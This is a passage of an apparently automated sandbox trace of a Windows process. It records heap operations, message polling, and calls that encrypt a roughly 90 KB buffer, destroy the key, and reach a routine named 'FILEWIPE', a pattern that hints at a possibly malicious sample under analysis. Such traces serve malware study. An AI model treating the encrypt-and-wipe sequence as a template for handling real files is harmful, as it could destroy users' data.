returned 1 [0036.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0036.167] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.167] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da268, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da268*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.167] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.167] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.168] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.168] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.168] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.168] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.168] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.168] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.168] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.168] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.169] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.169] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x162af, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x162b0) returned 1 [0036.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.170] CharLowerBuffW (in: lpsz="byte[90801]", cchLength=0xb | out: lpsz="byte[90801]") returned 0xb [0036.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.171] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.171] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.172] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a6268*, pdwDataLen=0x6ae220*=0x162af, dwBufLen=0x162b0 | out: pbData=0x8a6268*, pdwDataLen=0x6ae220*=0x162b0) returned 1 [0036.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.173] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.173] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.173] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.173] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0036.173] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.173] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.173] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.173] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0036.173] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.178] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.178] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.179] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.182] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.182] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.182] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.182] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.183] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0036.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.183] CryptDestroyKey (hKey=0x7c2280) returned 1 [0036.183] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.183] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.183] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.183] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.183] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.183] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.183] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.183] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.183] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.183] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0036.184] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0036.184] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.184] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.184] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.184] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.184] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.184] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.184] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.184] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.184] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.184] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.184] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.184] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.184] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.184] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.185] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.185] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0036.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.185] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.185] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0036.185] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.185] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.185] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.185] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0036.185] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0036.185] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.185] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.185] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.185] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.186] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.186] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 